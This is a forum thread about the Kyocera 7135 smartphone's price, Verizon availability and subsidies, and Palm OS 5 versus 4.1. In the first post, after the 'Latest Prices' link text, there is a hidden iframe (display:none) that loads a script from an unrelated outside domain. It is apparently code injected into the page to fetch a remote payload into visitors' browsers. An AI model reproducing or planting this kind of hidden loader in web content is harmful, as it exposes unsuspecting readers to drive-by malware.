+ Reply to Thread

Price drop to $600 on Kyocera web site

I just received an email from CNet indicating that the price is now $600 on Kyocera's site. I couldn't confirm the price because I didn't know what zip code to enter in order to get the site to list the 7135 as a phone to purchase. Here's a link to the CNet listing.

Kyocera 7135 - Latest Prices<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Sam

Hey Verizon, where is the 7135?
    Can you hear me now?

Assimilated
    Since I just got my 7135 yesterday and paid the $650...you can bet I rushed to getconnected to see if the price dropped. Fortunately (depending on your point of view it's still listed at $649.99 without a plan (I even followed the cNet link to getconnected). Bad news for those waiting for prices to fall.
    Tiger....JACK Tiger

Originally posted by JackTiger
    Bad news for those waiting for prices to fall.
    Don't sit around holding your breath until they lower the price on the 7135. It will take a long time. Probably a year. Hell, I just saw a 6035 at a Verizon Kiosk yesterday and they still wanted $250 for it! Sure I paid twice that two years ago, but they are almost all gone and being replaced by the amazing 7135.
    ~'kito
    pdaPhoneHome Moderator

Markito, thanks for your comment about it being "probably a year" before the price drops on the 7135.

I'm looking for a replacement 6035 to tide me over until then.

So when the price DOES drop, what would you expect to see? $500 instead of $600? Do you think it will go down when/if Verizon and other carriers also have it?

I am about to dump Sprint and their horrible customer service. I am waiting for the 7135 to make the move to Verizon. Do they offer any discounts/rebates for new subscribers?

Originally posted by james_garner
    I am about to dump Sprint and their horrible customer service. I am waiting for the 7135 to make the move to Verizon. Do they offer any discounts/rebates for new subscribers?
    Yeah, you'll get the subsidized sale price and not pay the $649 some of these jokers are paying....

After a year, it will probably drop down to $250, then several months later, they will probably offer rebates to bring it down to $99 or less! At least that is what they did with the 6035.

And here I am, back in line to shell out another $500.

Welcome to the forum Janine!
    ~'kito
    pdaPhoneHome Moderator

I'd be surprised to see the price drop that quickly. The 6035 was a tempting product, but too many of us were unwilling to give up our color screens (when we finally discovered the 6035). I think kyocera had to drop prices to increase demand for an outdated product.

The 7135 is lacking two things in my opinion that will affect price. Bluetooth, and os 5. I would think that some other technology has got to hit along with these two to drive the price down that much. The 7135 is a solid piece of technology, and is ahead of the curve in many respects. :angel

Originally posted by Steve B.
    I'd be surprised to see the price drop that quickly. The 6035 was a tempting product, but too many of us were unwilling to give up our color screens (when we finally discovered the 6035). I think kyocera had to drop prices to increase demand for an outdated product.

The 7135 is lacking two things in my opinion that will affect price. Bluetooth, and os 5. I would think that some other technology has got to hit along with these two to drive the price down that much. The 7135 is a solid piece of technology, and is ahead of the curve in many respects. :angel
    I read an article which stated that OS 5 has themes (that sounds cool), but I also understand that OS 5 requires the ARM processor.

I don't know a lot about OS 5, so don't beat me if I am wrong.

OT

Originally posted by imz14u2nv
    I read an article which stated that OS 5 has themes (that sounds cool), but I also understand that OS 5 requires the ARM processor.

I don't know a lot about OS 5, so don't beat me if I am wrong.
    OS 5.0 is a transitory OS - one designed to bridge the existing 4.x OS to the new 6.0 OS. The OS differences between 5.0 and 4.1 are slight at the user level - indeed many 4.1 devices use the 5.0 graphics API.

It is underneath the hood that things get different. O5 5.0 contains an interpreter (not really an emulator) that allows code written fo the Dragonball CPUs to run on the ARM chip (technically, ARM is not a chip it is a processor "core" design that is licenced to different manufacturers). These chips are faster than the exisitng Dragonball CPUs (which max out in Palm devices at 66MHz).

So, yes Palm OS does require an ARM CPU. BUT, many of the features that are in Palm OS 5.0 are also present in 4.1. The biggest advantage of 5.0 is the faster CPU that the devices run on (which also has a corresponding hit on shorter battery life - compare battery life on a Sony Clie NR70 and a iPaq).

But, the good news is that if it is skin you want, you don't need to wait for 5.0. There are skinning apps out there. The one I prefer is SilverScreen by PocketSensei (www.pocketsensei.com). I am still on the 1.9 version running on a Visor Deluxe (waiting for the 7135 ), but it is up to 2.9 on colour devices as well - also has VFS support and "ticker" apps for datebook/todo entries. Very cool, and if I am not mistaken what Mike Wren has on his 7135 screen over at his geek page .

Other skin and VFS managers are out there as well, but this should be taken up in a different thread.

Re: OT

Originally posted by Token User
    The one I prefer is SilverScreen by PocketSensei ([url]Very cool, and if I am not mistaken what Mike Wren has on his 7135 screen over at his geek page .

Yep, his phone has SilverScreen with this Christmas theme...

http://www.handango.com/PlatformProd...1&platformId=1
    ~'kito
    pdaPhoneHome Moderator